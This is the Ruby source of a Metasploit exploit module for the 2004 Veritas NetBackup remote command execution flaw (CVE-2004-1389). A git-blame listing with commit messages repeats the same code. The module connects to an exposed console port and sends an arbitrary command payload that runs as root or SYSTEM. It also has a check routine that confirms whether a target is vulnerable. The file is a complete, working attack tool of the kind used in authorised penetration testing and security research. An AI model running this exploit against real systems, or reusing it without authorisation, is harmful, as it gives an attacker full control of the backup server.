metasploit-framework/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VERITAS NetBackup Remote Command Execution',
      'Description'    => %q{
          This module allows arbitrary command execution on an
        ephemeral port opened by Veritas NetBackup, whilst an
        administrator is authenticated. The port is opened and
        allows direct console access as root or SYSTEM from
        any source address.
      },
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-1389' ],
          [ 'OSVDB', '11026' ],
          [ 'BID', '11494' ]
        ],
      'Privileged'     => true,
      'Platform'       => %w{ linux unix win },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        =>
        [
          ['Automatic', { }],
        ],
      'DisclosureDate' => 'Oct 21 2004',
      'DefaultTarget' => 0))
  end

  def check
    connect

    sploit = rand_text_alphanumeric(10)
    buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n"

    sock.put(buf)
    banner = sock.get_once

    disconnect

    if banner.to_s.index(sploit)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    sploit = payload.encoded.split(" ")

    buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n"
    buf << payload.encoded
    buf << "\n"

    sock.put(buf)
    res = sock.get_once

    print_status(res.to_s)

    handler
    disconnect
  end
end
Added veritas_netbackup_cmdexec module. git-svn-id: file:///home/svn/framework3/trunk@5914 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 09:45:47 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Added veritas_netbackup_cmdexec module. git-svn-id: file:///home/svn/framework3/trunk@5914 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 09:45:47 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::Tcp`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'VERITAS NetBackup Remote Command Execution',`
			`'Description' => %q{`
			`This module allows arbitrary command execution on an`
			`ephemeral port opened by Veritas NetBackup, whilst an`
			`administrator is authenticated. The port is opened and`
			`allows direct console access as root or SYSTEM from`
			`any source address.`
			`},`
			`'Author' => [ 'patrick' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2004-1389' ],`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`[ 'OSVDB', '11026' ],`
Remove bad references (dead links) These links are no longer available. They are dead links. 2015-10-27 17:41:32 +00:00			`[ 'BID', '11494' ]`
Retab modules 2013-08-30 21:28:54 +00:00			`],`
			`'Privileged' => true,`
Prefer Ruby style for single word collections According to the Ruby style guide, %w{} collections for arrays of single words are preferred. They're easier to type, and if you want a quick grep, they're easier to search. This change converts all Payloads to this format if there is more than one payload to choose from. It also alphabetizes the payloads, so the order can be more predictable, and for long sets, easier to scan with eyeballs. See: https://github.com/bbatsov/ruby-style-guide#collections 2013-09-24 17:33:31 +00:00			`'Platform' => %w{ linux unix win },`
Retab modules 2013-08-30 21:28:54 +00:00			`'Arch' => ARCH_CMD,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'BadChars' => '',`
			`'DisableNops' => true,`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'generic perl telnet',`
			`}`
			`},`
			`'Targets' =>`
			`[`
			`['Automatic', { }],`
			`],`
			`'DisclosureDate' => 'Oct 21 2004',`
			`'DefaultTarget' => 0))`
			`end`

			`def check`
			`connect`

			`sploit = rand_text_alphanumeric(10)`
			`buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n"`

			`sock.put(buf)`
Fix bad use of sock.get() and check() implementations Many of these modules uses sock.get() when they meant get_once() and their HTTP-based checks were broken in some form. The response to the sock.get() was not being checked against nil, which would lead to stack traces when the service did not reply (a likely case given how malformed the HTTP requests were). 2014-06-28 21:05:05 +00:00			`banner = sock.get_once`
Retab modules 2013-08-30 21:28:54 +00:00
			`disconnect`

Fix bad use of sock.get() and check() implementations Many of these modules uses sock.get() when they meant get_once() and their HTTP-based checks were broken in some form. The response to the sock.get() was not being checked against nil, which would lead to stack traces when the service did not reply (a likely case given how malformed the HTTP requests were). 2014-06-28 21:05:05 +00:00			`if banner.to_s.index(sploit)`
Retab modules 2013-08-30 21:28:54 +00:00			`return Exploit::CheckCode::Vulnerable`
			`end`
			`return Exploit::CheckCode::Safe`
			`end`

			`def exploit`
			`connect`

			`sploit = payload.encoded.split(" ")`

			`buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n"`
			`buf << payload.encoded`
			`buf << "\n"`

			`sock.put(buf)`
Fix bad use of sock.get() and check() implementations Many of these modules uses sock.get() when they meant get_once() and their HTTP-based checks were broken in some form. The response to the sock.get() was not being checked against nil, which would lead to stack traces when the service did not reply (a likely case given how malformed the HTTP requests were). 2014-06-28 21:05:05 +00:00			`res = sock.get_once`
Retab modules 2013-08-30 21:28:54 +00:00
			`print_status(res.to_s)`

			`handler`
			`disconnect`
			`end`
Added veritas_netbackup_cmdexec module. git-svn-id: file:///home/svn/framework3/trunk@5914 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 09:45:47 +00:00			`end`